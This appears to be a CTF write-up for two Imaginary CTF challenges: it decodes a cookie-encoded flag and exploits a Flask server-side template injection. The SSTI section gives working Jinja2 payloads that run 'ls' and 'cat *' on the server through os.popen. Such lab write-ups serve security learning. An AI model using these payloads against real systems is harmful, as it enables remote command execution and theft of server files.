Try   HackMD

rooCookie & SSTI golf

rooCookie

According to the description, it seems that the author set the flag as the password. And he said 'I fed my website some cookies so it would remember me' => Maybe flag in cookies

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

View source code

  • We get a function createToken(text) ,it performs the function of encrypting a text and then assign it to document.cookie
function createToken(text) {
	let encrypted = "";
  for (let i = 0; i < text.length; i++) {
		encrypted += ((text[i].charCodeAt(0)-43+1337) >> 0).toString(2)
  }
  document.cookie = encrypted
}

document.cookie = "token=101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101001011101001100001011000000010101111101101011111011010011000010100101110101001101001010010111010101111110101011011111011000000110110000001101100001011010111110110110000000101011100101010100101110100110000101011101111010111000110110000010101011101001011000100110101110110101001111101010111111010101000001101011011011010100010110101110110101011011111010100010110101101101101100001011010110111110101000011101011111001010100010110101101101101100000101010011111010100111110101011011011010111000010101000010101011100101011000101110100110000"
  • Notice there is a predefined document.cookie => This is flag ???
  • If so we just reverse the createToken() function to get the flag

Analysis of the coding process

  • First each character in text will go through the charCodeAt() function => the function will return the Unicode value of that character
  • That unicode value will continue to do the calculation (-43+1337)
  • '>>' is right shift operator but '>> 0' so the result does not change
  • And finally convert it to binary

Decryption script










token = "101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101001011101001100001011000000010101111101101011111011010011000010100101110101001101001010010111010101111110101011011111011000000110110000001101100001011010111110110110000000101011100101010100101110100110000101011101111010111000110110000010101011101001011000100110101110110101001111101010111111010101000001101011011011010100010110101110110101011011111010100010110101101101101100001011010110111110101000011101011111001010100010110101101101101100000101010011111010100111110101011011011010111000010101000010101011100101011000101110100110000"
decryp = ''
k=11
for i in range (len(token)//11-1):
	decryp+=chr(int(token[k:k+11],2)-1337+43)
	k=k+11
	
print(decryp)
#sername="roo" & password="ictf{h0p3_7ha7_wa5n7_t00_b4d}"

Flag : ictf{h0p3_7ha7_wa5n7_t00_b4d}

SSTI golf

Check source code

#!/usr/bin/env python3

from flask import Flask, render_template_string, request, Response

app = Flask(__name__)

@app.route('/')
def index():
    return Response(open(__file__).read(), mimetype='text/plain')

@app.route('/ssti')
def ssti():
    query = request.args['query'] if 'query' in request.args else '...'
    if len(query) > 48:
        return "Too long!"
    return render_template_string(query)

app.run('0.0.0.0', 1337)
  • The function '/' will show source code
  • The function '/ssti' is mapped with the '/ssti' path and takes the query parameter => /ssti?query=
  • The input query will be checked for length if it exceeds 48 then return "To long"
  • If less than 48 characters will return render_template_string(query)

Note : The page uses render_template_string for rendering the HTML response.The function renders the template directly from a string which can trigger a potential Server-Side Template Injection (SSTI) if the string has been modified to include a valid python code.

Exploit

  • Challenge is written in Python and runs the Jinja2 template.I found a basic payload of {{7*7}}. I injected the inputs query with the payload and analyzed the responses. => Successful !!!

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

  • I use this payload to list all file names :

{{lipsum.__globals__['os'].popen('ls').read()}}

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

  • Because the file name is too long I used the command cat * to read all the files in the current folder

{{lipsum.__globals__.os.popen('cat *').read()}}

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Flag : ictf{F!1+3r5s!?}

Refer to the connection

https://chowdera.com/2020/12/20201221231521371q.html
https://workshops.devax.academy/security-for-developers/module9/fix_ssti_vulnerability.html
https://hackmd.io/@Chivato/HyWsJ31dI#What-is-a-SSTI

Last changed by 
Akatsuki
Writeup for Imaginary CTF's challenges
0
190

Read more

unpuzzled4 - Forensic

In this challenge, the first thing I do is join discord server, and find unpuzzler7 Easily, I searched the name in discord like this First, I checked all the message from unpuzzler7 or mentions unpuzzler7. But there is nothing. Then, I clicked on his name and see Fliker&apos;s link Clicked on the link, I saw 2 picture

Jul 21, 2022
maas - Web Challenge

Based on the source code provided, we see that the web has a few basic functions as follows: allows users to create their own account, has the function to allow login to the newly created account and will display a flag. for admin user. The admin user will be created first when the site starts running Registration with an existing account is not allowed, the cookie is set to the SHA256 of the password, use this cookie field to identify the user and store information such as the user&apos;s username, uuid The login function seems a bit strange, because it does not need to care about the username but only the password, does not check if the user exists or not and only SHA256 encrypts the password that has just been sent to set for cookie field. Besides, there is a function to list users, and we can see their uuid.

Jul 20, 2022
1337 - Web challenge

In this challenge we can easily see its source code at: Source code At the same time, it is easy to see the Dockerfile, based on the Dockerfile we can realize that the name of the flag file has been changed. Looking at the main thread of execution, at the / endpoint, the server receives 2 main params, text and dir then these 2 parameters are passed through a function called leetify for processing and then rendered by the web server The leetify function has a fairly simple function of filtering out blacklisted characters and replacing the corresponding alphanumeric characters in the preset dictionary,

Jul 20, 2022
Minecraft

This is a heap challenge with a new technique called House of Husk. You can read this technique here or here. At first reading the decompiler, I notice there is a Format String bug when I (l)eak the end poem. There is also a Use-After-Free bug when I (b)reak a block and keep it in inventory and then (r)eplace a block. Other options are secured, no of-by-one or any bug so I are sure I will use technique House of Husk for this challenge. Trying to write a script as first link above, I can get arbitrary execution now: #!/usr/bin/python3 from pwn import * import subprocess

Jul 19, 2022
Read more from Akatsuki
Published on HackMD